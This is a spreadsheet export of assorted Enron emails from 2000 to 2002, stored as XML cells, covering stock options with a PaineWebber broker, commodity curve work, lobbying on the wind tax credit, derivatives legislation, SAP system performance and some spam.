We'll get the paperwork together and sent to you for naked options.  At some _x000D_
point, I'd like to talk about the diversification strategy in more detail -- _x000D_
perhaps over dinner or a quick meeting after the markets close?_x000D_
_x000D_
Michael Gapinski_x000D_
Account Vice President_x000D_
Emery Financial Group_x000D_
PaineWebber, Inc._x000D_
713-654-0365_x000D_
800-553-3119 x365_x000D_
Fax: 713-654-1281_x000D_
Cell: 281-435-0295_x000D_
_x000D_
-----Original Message-----_x000D_
From: John.Arnold@enron.com [SMTP:John.Arnold@enron.com]_x000D_
Sent: Tuesday, February 20, 2001 10:14 PM_x000D_
To: michael.gapinski@painewebber.com_x000D_
Subject: Re: Buying back calls_x000D_
_x000D_
_x000D_
Michael:_x000D_
Appreciate the idea.  However, with my natural long, I'm not looking to_x000D_
really trade around the position.  I believe ENE will continue to be range_x000D_
bound, but in case it is not, I don't want to forgo 50% of my option_x000D_
premium._x000D_
I have price targets of where I would like to lighten up exposure to ENE_x000D_
and will use calls to implement the stategy.  To that regards, I noticed I_x000D_
was not approved to sell naked calls.  I would like that ability in order_x000D_
to hedge some exposure I have of unexercised vested options.  Please look_x000D_
into that for me._x000D_
John._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Michael Gapinski" &lt;michael.gapinski@painewebber.com&gt; on 02/20/2001_x000D_
06:28:27 PM_x000D_
_x000D_
To:   "'Arnold, John'" &lt;john.arnold@enron.com&gt;_x000D_
cc:_x000D_
Subject:  Buying back calls_x000D_
_x000D_
_x000D_
John -_x000D_
_x000D_
I was looking at the recent pullback in ENE and thinking it might be an_x000D_
opportunity to buy back the calls you sold.  Of course, you would then be_x000D_
in a position to sell calls again if the stock makes a bounce.  I'm not_x000D_
sure that ENE @ 75 is the place, but maybe @ 73.  Call me if you're_x000D_
interested._x000D_
_x000D_
Michael Gapinski_x000D_
Account Vice President_x000D_
Emery Financial Group_x000D_
PaineWebber, Inc._x000D_
713-654-0365_x000D_
800-553-3119 x365_x000D_
Fax: 713-654-1281_x000D_
Cell: 281-435-0295_x000D_
_x000D_
_x000D_
_x000D_
Notice Regarding Entry of Orders and Instructions: Please_x000D_
do not transmit orders and/or instructions regarding your_x000D_
PaineWebber account(s) by e-mail. Orders and/or instructions_x000D_
transmitted by e-mail will not be accepted by PaineWebber and_x000D_
PaineWebber will not be responsible for carrying out such orders_x000D_
and/or instructions.  Notice Regarding Privacy and Confidentiality:_x000D_
PaineWebber reserves the right to monitor and review the content of_x000D_
all e-mail communications sent and/or received by its employees._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Notice Regarding Entry of Orders and Instructions: Please_x000D_
do not transmit orders and/or instructions regarding your_x000D_
PaineWebber account(s) by e-mail. Orders and/or instructions_x000D_
transmitted by e-mail will not be accepted by PaineWebber and_x000D_
PaineWebber will not be responsible for carrying out such orders_x000D_
and/or instructions.  Notice Regarding Privacy and Confidentiality:_x000D_
PaineWebber reserves the right to monitor and review the content of_x000D_
all e-mail communications sent and/or received by its employees._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Apr 2001 15:46:44 -0700 (PDT)</t>
  </si>
  <si>
    <t>Brad Holmes</t>
  </si>
  <si>
    <t>Dave Neubauer 9:30-10:00 @ x37240, EB4160_x000D_
Steve Hotte 10:00-10:30_x000D_
Danny McCarty 10:30-11:00 @ 10:30-11:00</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 09:42:43 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'chris.wiebe@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'greg.hibbert@enron.com', 'cooper.richey@enron.com', 'pavel.koulikov@enron.com', 'chris.wiebe@enron.com', 'richard.mckeel@enron.com'})</t>
  </si>
  <si>
    <t>IIS Meeting</t>
  </si>
  <si>
    <t>As per email</t>
  </si>
  <si>
    <t>Mon, 19 Mar 2001 07:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'nelson.neale@enron.com'})</t>
  </si>
  <si>
    <t>Softs in London</t>
  </si>
  <si>
    <t>Vince,_x000D_
_x000D_
With regard to the softs curves development, I have been communicating with a _x000D_
couple of folks in London.  The key contacts include James Willis (cocoa and _x000D_
sugar broker) and Nigel Majury (coffee broker).  We had a conference call on _x000D_
Thursday (Heather, Trena, Erin, James, Nigel, Frank Speight, Nelson) to _x000D_
discuss data sources, data acquisition, priorities, and timelines.  A number _x000D_
of data sources were identified (e.g., USDA, Int'l Cocoa Organization, ED&amp;F _x000D_
Man, Landell-Mills Commodities, etc.) and both the Houston and London offices _x000D_
have taken steps to obtain the information.  Curve development priorities _x000D_
were adjusted as well.  Raw sugar remains the top priority; however, cocoa _x000D_
replaces coffee in the softs importance hierarchy.  I suppose that this _x000D_
results from our physical (or soon to be) positions in both markets.  The _x000D_
timeline hasn't changed; however, adjustments will have to be made since we _x000D_
haven't yet acquired all of the necessary data for price modeling.  Moreover, _x000D_
per our discussion this afternoon, additional thought/time will have to be _x000D_
devoted to corn modeling to come up with an adequate hedging strategy._x000D_
_x000D_
Nelson</t>
  </si>
  <si>
    <t>Mon, 2 Jul 2001 09:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.metts@enron.com'})</t>
  </si>
  <si>
    <t>RE: Wind Production Tax Credit (PTC)</t>
  </si>
  <si>
    <t xml:space="preserve">Linda and I are following the PTC for Corp. out of DC.  Ed Coats in Enron _x000D_
Corporate Tax leads from Houston.  We have a Bracewell Patterson attorney in _x000D_
DC retained to support our corporate tax efforts on Capitol Hill.  _x000D_
_x000D_
Enron Wind also has a lobbyist dedicated 24/7 to this effort.  _x000D_
_x000D_
  _x000D_
_x000D_
_x000D_
_x000D_
	Mark Metts/Enron@EnronXGate_x000D_
	07/02/2001 10:40 AM_x000D_
		 _x000D_
		 To: Chris Long/Corp/Enron@ENRON_x000D_
		 cc: Steven J Kean/NA/Enron@Enron_x000D_
		 Subject: RE: Wind Production Tax Credit (PTC)_x000D_
_x000D_
Chris,_x000D_
_x000D_
Thanks very much for the prompt reply.  This is exactly what I needed.  Who _x000D_
is working this in-house?  Do we have any outside resources devoted to it?_x000D_
_x000D_
Mark_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Long, Chris  _x000D_
Sent: Monday, July 02, 2001 8:45 AM_x000D_
To: Metts, Mark_x000D_
Cc: Kean, Steven; Robertson, Linda; Decker, Larry; Fisher, Dolores_x000D_
Subject: Wind Production Tax Credit (PTC)_x000D_
_x000D_
Mark - I left a voice mail on your cell._x000D_
_x000D_
The Wind Production Tax Credit expires on December 31, 2001.   The PTC will _x000D_
be extended.   There is significant bipartisan support for the PTC, the _x000D_
revenue number is reasonable, and renewables are a key component of the _x000D_
energy debate._x000D_
_x000D_
The question is when and how.  Two likely scenarios are:_x000D_
_x000D_
1)  As part of the Energy Bill.  The House Ways and Means Committee will _x000D_
mark-up the tax portions of the energy bill in mid-July.  We understand that _x000D_
Chairman Thomas is committed to including the PTC as part of the Ways and _x000D_
Means bill.  The Senate Finance Committee has not scheduled a mark-up.  While _x000D_
the energy bill will be debated during July, final action will likely not _x000D_
occur until after the August recess.   In this scenario, look to September at _x000D_
the earliest._x000D_
_x000D_
2)  There are 10 provisions, including the PTC,  in the IRC that expire by _x000D_
December 31, 2001.   Historically, Congress approves an "extenders" package _x000D_
late in the session to keep the tax credits functioning.   While no one can _x000D_
predict when Congress will adjourn, they are set to adjourn in early _x000D_
October.  In this scenario, the PTC would be extended in late September at _x000D_
the earliest._x000D_
_x000D_
Mark, this is Congress, so anything can change.  _x000D_
_x000D_
Call me with any questions at (202) 466-9158._x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 02:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rosalee.fleming@enron.com', 'cynthia.sandherr@enron.com', 'chris.long@enron.com', 'mark.taylor@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: CEA Update Bad News</t>
  </si>
  <si>
    <t>----- Forwarded by Tom Briggs/NA/Enron on 10/25/2000 08:01 AM -----_x000D_
_x000D_
	RAISLERK@sullcrom.com_x000D_
	10/25/2000 07:51 AM_x000D_
		 _x000D_
		 To: tom.briggs@enron.com_x000D_
		 cc: _x000D_
		 Subject: Fwd: CEA Update Bad News_x000D_
_x000D_
_x000D_
Senator Gramm's staff presented to the Senate Ag Committee Republican and_x000D_
Democratic staff and the Democratic staff of the Senate Banking Committee,_x000D_
Gramm's proposed changes to the CEA bill. This proposal is quite lengthy,_x000D_
and includes many amendments most of which were previously discussed with_x000D_
the House Agriculture Committee, some of which were included in House_x000D_
Agriculture Committee Saturday Night Draft of 10/8/00. Because of the length_x000D_
of the document we have only attached the summary that the Gramm staff_x000D_
provided. In separate e-mails to follow we will send only the pages of the_x000D_
House-passed bill that were changed by the Gramm proposal. As you know  some _x000D_
of these provisions include matters objectionable to_x000D_
Treasury, SEC, CFTC, Chicago and New York Exchanges. Essentially the Gramm_x000D_
staff has included proposals which would allow retail and agency_x000D_
transactions as well as language designed to solve the Blackbird problem._x000D_
As you also know the view of the Agencies and the Ag Comm is that  some of_x000D_
these exclusions create loopholes which can allow some market participants_x000D_
to avoid the new Single Stock Futures regulatory design, the CFTC oversight_x000D_
of the energy market, and go far beyond the recommendations of the_x000D_
President's Working Group._x000D_
The staffs of the Banking and Agriculture Committees have agreed to meet_x000D_
tomorrow late morning. We believe at that time the Agriculture Committee_x000D_
will propose a counter-offer which while addressing the Gramm major concerns_x000D_
will not adopt his proposal but instead rely on the Treasury proposals. If_x000D_
Senator Gramm is willing to work off this alternative a negotiation may_x000D_
result, otherwise it is unlikely that any agreement with Gramm will be_x000D_
reached. The Agriculture Committee is disinclined to repeat the debates held_x000D_
in the House Agriculture Comm. consideration of the bill. We welcome your _x000D_
reaction to the proposal. If you have questions or comments_x000D_
please do not hesitate to call Mary (973-5907), or George (973-5920). &lt;&lt;Gramm _x000D_
Summary.pdf&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
----------------------------------_x000D_
_x000D_
This e-mail is sent by a law firm and contains information_x000D_
that may be privileged and confidential. If you are not the_x000D_
intended recipient, please delete the e-mail and notify us_x000D_
immediately._x000D_
_x000D_
 - Gramm Summary.pdf</t>
  </si>
  <si>
    <t>Tue, 11 Jan 2000 09:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'aggie_chic02@hotmail.com'})</t>
  </si>
  <si>
    <t>Re: new email</t>
  </si>
  <si>
    <t>Hey, I think that we are coming in this weekend.  We are only going to be _x000D_
there through Sat nite though.  See you then._x000D_
_x000D_
D</t>
  </si>
  <si>
    <t>Mon, 29 Oct 2001 14:26:46 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'hr.dl-isc@enron.com', 'accounting.dl-isc@enron.com', 'cio.dl-isc@enron.com', 'operations.dl-isc@enron.com'})</t>
  </si>
  <si>
    <t>Update on SAP System Response</t>
  </si>
  <si>
    <t>As you may recall, the SAP system response time was slow during the September Quarter-end close period. The Integrated Solutions Center (ISC) has been working diligently to address the root causes of this issue and can report that significant progress has been made.  With the October month-end close fast approaching, we want to provide you with an update as to the progress made in identifying and addressing the root causes for slow system response._x000D_
_x000D_
Poor Performing Programs_x000D_
The ISC has identified a number of poor performing programs.  Some program redesign has already occurred with continued efforts proceeding through year end.  In addition, system and data base parameters as well as indexes have been tuned. These actions have resulted in improvements that should enable Enron to realize better system response in the upcoming close._x000D_
_x000D_
Workload Distribution_x000D_
The ISC has identified jobs, both scheduled and user submitted, that result in system "bottlenecks".  We have accelerated the purchase of system hardware to provide additional capacity and expect this upgrade to occur prior to year-end close. In addition, the ISC has implemented a plan to provide business users with more information regarding efficient methods of report execution.  Workshops are currently being conducted with key "close-users" from the various business units to provide techniques that will enable more efficient report execution during the close process. _x000D_
_x000D_
Improved Close Monitoring_x000D_
The ISC has been working to heighten the monitoring of key close jobs in order to more effectively identify and resolve close related issues. An initiative is underway to improve the utilization of automated tools to better monitor, identify, and escalate close-related problems.  _x000D_
_x000D_
Communication Strategy Implement_x000D_
The ISC has established a plan to more effectively communicate to our customers in the event of future system performance issues.  This plan will ensure that information will be provided to users regarding system performance and resolution status in a timely manner._x000D_
_x000D_
Please feel free to contact me if you would like additional details regarding our efforts to improve overall system performance._x000D_
_x000D_
Allan Sommer_x000D_
Enron ISC_x000D_
713-345-5291</t>
  </si>
  <si>
    <t>Thu, 18 May 2000 04:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'steven.harris@enron.com', 'bill.cordes@enron.com'})</t>
  </si>
  <si>
    <t>Pueblo</t>
  </si>
  <si>
    <t xml:space="preserve">I got a call from Tino Monaldo today passing on the results of Dennis _x000D_
Langley's meeting with DOE in Albuquerque.  DOE indicated that their current _x000D_
PNM rate is "5.3 cents, exclusive of the demand charge."  Tino's consultant _x000D_
claims that factoring in the demand charge yields an effective rate of _x000D_
approximately 7 cents/KWh.  Assuming we need to come in at 10% less than the _x000D_
current rate, our bogey is 6.3 cents/KWh.  This is at the high end of the _x000D_
range we hoped they'd be in._x000D_
_x000D_
Additionally, DOE indicated that they need "redundancy" and don't want to _x000D_
rely on PNM for back up power.  They want a multiple turbine facility--i.e., _x000D_
more smaller turbines instead of fewer large turbines.  The new pipeline will _x000D_
need to be split connected to El Paso and TW in order to access diverse _x000D_
supplies and guard against supply failure.  They have not asked for fuel oil _x000D_
backup.  _x000D_
_x000D_
I know this is starting to look like the project that won't go away, but the _x000D_
power price number looks very promising to me.  I think its worth scrubbing _x000D_
down the model we've used to replace the generic capital cost and O&amp;M _x000D_
assumptions with more specific assumptions related to the specific turbine _x000D_
configuration we'd be using.  _x000D_
_x000D_
If this price is really as favorable as I think, can we make another run at _x000D_
the ENA people and Federal Solutions guys to see if they have any interest?  _x000D_
DF      </t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 05:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Avistar Systems</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kevin G Moore/HOU/ECT on 10/24/2000 01:08 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Paige Cox@ENRON_x000D_
10/24/2000 08:54 AM_x000D_
To: Kevin G Moore/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Avistar Systems  _x000D_
_x000D_
You're welcome._x000D_
_x000D_
I have Vince on the list now. We are installing this week and over next _x000D_
weekend. We'll have to go to the location to see if we'll have to pull _x000D_
additional cable to Vince's desk. I wouldn't look for it to be in before next _x000D_
Monday._x000D_
_x000D_
With regards to the billing -- I will have Stella Ely get with you on that._x000D_
_x000D_
Thank you for all of the info_x000D_
_x000D_
Paige_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kevin G Moore@ECT_x000D_
10/24/2000 08:47 AM_x000D_
To: Mike A Roberts/HOU/ECT@ECT, Paige Cox/Corp/Enron@Enron, Vince J _x000D_
Kaminski/HOU/ECT@ECT, Shirley Crenshaw/HOU/ECT@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Avistar Systems_x000D_
_x000D_
I really appreciate you speaking with Gary regarding_x000D_
the Avistar System. _x000D_
Please inform me on what I need to do to make the process_x000D_
continue._x000D_
_x000D_
The location for the Avistar is EB3240D._x000D_
 The location belongs to Vince Kaminski._x000D_
_x000D_
If you need more information please call x34710._x000D_
If possible, would you please inform me as when to_x000D_
expect the system connection date and time._x000D_
_x000D_
    _x000D_
                                     Thanks_x000D_
                                   Kevin Moore_x000D_
                              _x000D_
_x000D_
_x000D_
                      _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 02:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: NDAs for Pan Handle Eastern Pipeline co</t>
  </si>
  <si>
    <t xml:space="preserve">No, I have not received the fully executed document yet from Steve._x000D_
_x000D_
_x000D_
_x000D_
	Fred Philipson/ENRON@enronXgate_x000D_
	05/29/2001 09:14 AM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: NDAs for Pan Handle Eastern Pipeline co_x000D_
_x000D_
Tana,_x000D_
_x000D_
Just a follow up.  Did you happen to receive the above from Steve Hotte of _x000D_
ETS?  If so, has a copy been forwarded to Pan Handle Eastern Pipeline co?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 09:07:31 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: The FIRST Warning Sign</t>
  </si>
  <si>
    <t xml:space="preserve">ARE YOU BORED...   BY THE WAY..ENRON STOCK IS DOWN TO 16.  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Quenet, Rebecca" &lt;rebecca.quenet@eds.com&gt;@ENRON  _x000D_
Sent:	Wednesday, October 24, 2001 10:51 AM_x000D_
To:	'Banks, Zoe'; Quenet, Joe; 'Spicochi, Elsa'; 'Liepins, Otto'_x000D_
Subject:	FW: The FIRST Warning Sign_x000D_
_x000D_
Closeups of the WTC..._x000D_
_x000D_
-----Original Message-----_x000D_
From: Steve &amp; Debbie Barone [mailto:sandbar1@optonline.net]_x000D_
Sent: Wednesday, October 24, 2001 10:41 AM_x000D_
To: Glenn Wylie; Watson, Dan; Wasilewski, Paul; Tarallo, Dan; Stadtman,_x000D_
Chuck; Kevin Sorce; Rick Schroeder; Harry Roch; Rebecca Quenet; Matt_x000D_
Oleary; Nick Nesto; Diana Miller; Bobby &amp; Josephine Menendez; Mantione,_x000D_
Charles; Chris Little; Krambach, Tom; Laura Giampietro; Rich Flynn; Joe_x000D_
Fanelli; Drews, Richie; Draper, Daniel; Domenic, Matt; John Dodge;_x000D_
Joseph Dick; Dennis Villanueva; Dean Delitta; Suzette Cushman; Cushman,_x000D_
John; Ken Cherasaro; Busichio, John; Daniel Burrer; Buck, Charlie; Ron_x000D_
Bartke; Terry &amp; Lenore Barone; Brian Barone_x000D_
Subject: Fw: The FIRST Warning Sign_x000D_
_x000D_
_x000D_
&gt; FBI have uncovered the very first warning sign that was from one of the_x000D_
WTC_x000D_
&gt; towers._x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
 - advertencia.pps &lt;&lt; File: advertencia.pps &gt;&gt; </t>
  </si>
  <si>
    <t>Mon, 12 Feb 2001 04:58:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'john.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Index Points</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Scott Neal/HOU/ECT on 02/12/2001 12:57 PM _x000D_
---------------------------_x000D_
From: Jess Hewitt@EES on 02/08/2001 09:11 AM_x000D_
To: Scott Neal/HOU/ECT@ECT_x000D_
cc: Don Black/HOU/EES@EES, James W Lewis/HOU/EES@EES _x000D_
Subject: Index Points_x000D_
_x000D_
Scott,_x000D_
_x000D_
Here is a list of index points that we can start looking at to determine _x000D_
where ENA can serve EES:_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 Jan 2002 05:13:04 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'h..lewis@enron.com'})</t>
  </si>
  <si>
    <t>1000 Free PowerBall Chances for Saturday, January 26, 2002</t>
  </si>
  <si>
    <t>PLEASE READ FULL MESSAGE TO LEARN HOW TO GET 1,000 FREE CHANCES AT THE_x000D_
$92,000,000.00 POWERBALL for Saturday, January 26, 2002!_x000D_
_x000D_
Nobody won PowerBall on Wednesday BUT twelve lucky FreeLotto Players did win $21,000,000.00 in Jackpots! That's really no surprise when you consider that the odds of winning Classic FreeLotto's  $1,000,000.00 Grand Prize are far better than winning PowerBall. In fact, all but their SuperBucks game have better odds than PowerBall._x000D_
_x000D_
http://www.freelotto.com/offer.asp?offer=24365_x000D_
_x000D_
Did you stand in a long line for hours to buy a PowerBall ticket?_x000D_
Here's a thousand FREE chances to crack one of the biggest Lotto_x000D_
Jackpots ever. FreeLotto.com is giving you a chance to get in on the action with the PowerBall Club. With FreeLotto's Automatic Subscription Ticket service (F.A.S.T.), you will not only get in on the PowerBall Club, but you will also get 180 chances every month to be entered in each of FreeLotto's six daily jackpot drawings!  That's 180 chances every month at over $11,000,000.00 in prizes EVERY DAY!  Simply subscribe to FreeLotto's F.A.S.T. service and in addition to 6 chances a day to win over $11,000,000.00 in daily prizes, they'll give every new F.A.S.T. subscriber a share of any Jackpot winnings from the 1,000 PowerBall tickets for Saturday January 26th, 2002, listed at the url below._x000D_
_x000D_
_x000D_
http://www.freelotto.com/offer.asp?offer=24365_x000D_
_x000D_
_x000D_
Again, if you click the link below and subscribe to F.A.S.T. before_x000D_
6:00 PM EDT on Saturday, January 26th, 2002, you will also get a share_x000D_
of any jackpot winnings from the 1,000 PowerBall tickets listed below._x000D_
They don't know how many new F.A.S.T. subscribers will take advantage_x000D_
of this offer, but with an estimated $92,000,000.00 (Ninety Two Million Dollar) Jackpot, there's plenty of cash to go around!_x000D_
_x000D_
http://www.freelotto.com/offer.asp?offer=24365_x000D_
_x000D_
_x000D_
To get in on the action without subscribing to F.A.S.T. please click_x000D_
the link below:_x000D_
http://www.freelotto.com/redirect.asp?source=10066_x000D_
and join FreeLotto for your chance to win over $11,000,000.00 everyday_x000D_
You must join no later than 6:00 PM EDT on Saturday, January 26th, 2002. Limit one entry per username._x000D_
_x000D_
Click here to view the PowerBall numbers:_x000D_
http://www.freelotto.com/offer.asp?offer=24366_x000D_
_x000D_
_x000D_
Rules:_x000D_
http://www.freelotto.com/offer.asp?offer=24344_x000D_
_x000D_
_x000D_
_x000D_
&lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt;_x000D_
* To remove yourself from this mailing list, point your browser to:_x000D_
http://i.pm0.net/remove?funnymoney:10_x000D_
* Enter your email address (Andrew.H.Lewis@enron.com) in the field_x000D_
provided and click "Unsubscribe". The mailing list ID is "funnymoney:10"._x000D_
_x000D_
OR..._x000D_
_x000D_
* Reply to this message with the word "remove" in the subject line._x000D_
_x000D_
This message was sent to address Andrew.H.Lewis@enron.com_x000D_
X-PMG-Recipient: Andrew.H.Lewis@enron.com_x000D_
&lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt; &lt;&lt;&lt;&gt;&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
pmguid:1c.1gpy.803w8</t>
  </si>
  <si>
    <t>Mon, 4 Jun 2001 04:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'bjorn.hagelmann@enron.com', 'jeff.blumenthal@enron.com', 'susan.musch@enron.com', 'larry.hunter@enron.com', 'john.swinney@enron.com', 'tom.moran@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Product type approval needed (US Crude WTI Fin Spd)</t>
  </si>
  <si>
    <t>Please approve the following new product type in Data Manager after 11 A.M._x000D_
_x000D_
US Crude WTI Fin Spd_x000D_
_x000D_
(Please note that this product type will replace the existing US Crude WTI _x000D_
Cal Spd Fin Swap)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t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 06:52:41 -0800 (PST)</t>
  </si>
  <si>
    <t>Did you get that info over to Rick yet?  Just a friendly reminder if not._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>Wed, 26 Jul 2000 14:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Power and Exotics TXT</t>
  </si>
  <si>
    <t>Hopefully the third times a charm!_x000D_
_x000D_
Robin</t>
  </si>
  <si>
    <t>Wed, 28 Nov 2001 07:54:21 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'steve.walton@enron.com', 'm..landwehr@enron.com', 'luiz.maurer@enron.com', 'robert.neustaedter@enron.com', 'david.mangskau@enron.com', 'margo.reyna@enron.com', 'frank.rishe@enron.com', 'marchris.robinson@enron.com', 'paul.kaufman@enron.com', 'lynnette.barnes@enron.com', 'vinio.floris@enron.com', 'guillermo.canovas@enron.com', 'kathleen.sullivan@enron.com', 'harry.kingerski@enron.com', 'e..rosenberg@enron.com', 'robert.frank@enron.com', 'jerry.boston@enron.com', 'gloria.ogenyi@enron.com', 'maria.arefieva@enron.com', 'alberto.levy@enron.com', 'allison.hamilton@enron.com', 'roy.boston@enron.com', 'linda.robertson@enron.com', 'bevin.hunter@enron.com', 'john.shelk@enron.com', 'j..kean@enron.com', 'carmen.perez@enron.com', 'bill.moore@enron.com', 'carin.nersesian@enron.com', 'steve.montovano@enron.com', 'scott.reblitz@enron.com', 'ginger.dernehl@enron.com', 'kirsten.bellas@enron.com', 'helen.rizzo@enron.com', 'a..gomez@enron.com', 'denis.tu@enron.com', 'shelley.corman@enron.com', 'jean.dressler@enron.com', 'kimberly.watson@enron.com', 'darran.binns@enron.com', 'kikumi.kishigami@enron.com', 'elizabeth.linnell@enron.com', 'jeff.dasovich@enron.com', 'bernadette.hawkins@enron.com', 'jack.boatman@enron.com', 'l..lawrence@enron.com', 'donald.lassere@enron.com', 'j..noske@enron.com', 'stephen.dowd@enron.com', 'lindy.donoho@enron.com', 'pat.shortridge@enron.com', 'ramon.alvarez@enron.com', 'sue.nord@enron.com', 'alan.comnes@enron.com', 'rubena.buerger@enron.com', 'geriann.warner@enron.com', 'patrick.keene@enron.com', 'sharon.farrell@enron.com', 'samuel.leonardo@enron.com', 'robert.hayes@enron.com', 'john.hardy@enron.com', 'sarah.novosel@enron.com', 'rob.bradley@enron.com', 'leslie.lawner@enron.com', 'l..nicolay@enron.com', 'jean.mrha@enron.com', 'joe.allen@enron.com', 'steven.harris@enron.com', 'nancy.hetrick@enron.com', 'daniel.allegretti@enron.com', 'fino.tiberi@enron.com', 'carolyn.cooney@enron.com', 'maureen.mcvicker@enron.com', 'germain.palmer@enron.com', 'rachel.cady@enron.com', 'richard.ingersoll@enron.com', 'terri.miller@enron.com', 'robert.hemstock@enron.com', 'donna.fulton@enron.com', 'w..cantrell@enron.com', 'andy.rodriquez@enron.com', 'dave.perrino@enron.com', 'dan.staines@enron.com', 'lora.sullivan@enron.com', 'stanley.horton@enron.com', 'richard.shapiro@enron.com', 'larry.decker@enron.com', 'joseph.alamo@enron.com', 'd..steffes@enron.com', 'maggy.huson@enron.com', 'janine.migden@enron.com', 'charles.yeung@enron.com', 'howard.fromer@enron.com', 'bill.cordes@enron.com', 'bryan.gottfredson@enron.com', 'jean.ryall@enron.com', 'kerry.stroup@enron.com', 'danny.mccarty@enron.com', 'laurie.knight@enron.com'})</t>
  </si>
  <si>
    <t>November Gas Flows</t>
  </si>
  <si>
    <t>The topic of the November Gas Flows is Shortage to Surplus_x000D_
_x000D_
 _x000D_
_x000D_
Rita Hartfield_x000D_
Phone:  713-853-5854_x000D_
Fax:  713-646-4702_x000D_
Cell:  713-504-5428_x000D_
Rita.Hartfield@enron.com</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 12:34:04 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Master Netting - Tractebel</t>
  </si>
  <si>
    <t>Tractebel Energy Marketing, Inc._x000D_
Enron North America Corp._x000D_
Enron Power Marketing, Inc._x000D_
_x000D_
	phy power, phy gas, financial trading_x000D_
_x000D_
_x000D_
Marie - I will be out of the office beginning tomorrow._x000D_
_x000D_
Ed_x000D_
_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Heard, Marie  _x000D_
Sent:	Wednesday, November 14, 2001 2:28 PM_x000D_
To:	Sacks, Edward_x000D_
Subject:	FW: Master Netting - Tractebel_x000D_
_x000D_
Ed:_x000D_
_x000D_
Will you get me a list of counterparties/documents?_x000D_
_x000D_
Thanks!_x000D_
_x000D_
Marie_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Sager, Elizabeth  _x000D_
Sent:	Wednesday, November 14, 2001 11:27 AM_x000D_
To:	Heard, Marie_x000D_
Subject:	FW: Master Netting - Tractebel_x000D_
_x000D_
has this been assigned_x000D_
_x000D_
_x000D_
Elizabeth Sager_x000D_
713-853-6349_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Sacks, Edward  _x000D_
Sent:	Monday, November 12, 2001 1:15 PM_x000D_
To:	Sager, Elizabeth; Williams, Jason R (Credit)_x000D_
Subject:	Master Netting - Tractebel_x000D_
_x000D_
Tractebel has requested a Master Netting agmt.  Please forward a draft to Laura Kinner at_x000D_
_x000D_
_x000D_
lkinner@tractebelusa.com_x000D_
713-350-1763_x000D_
713-548-5153 (fax)_x000D_
_x000D_
_x000D_
Ed</t>
  </si>
  <si>
    <t>Thu, 22 Jun 2000 02:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ted.murphy@enron.com', 'george.mcclellan@enron.com', 'rick.buy@enron.com', 'kevin.mcgowan@enron.com', 'david.delainey@enron.com'})</t>
  </si>
  <si>
    <t>Emmisions</t>
  </si>
  <si>
    <t>The Emmisions book under Kevin McGowan will take a one time $4 Million hit _x000D_
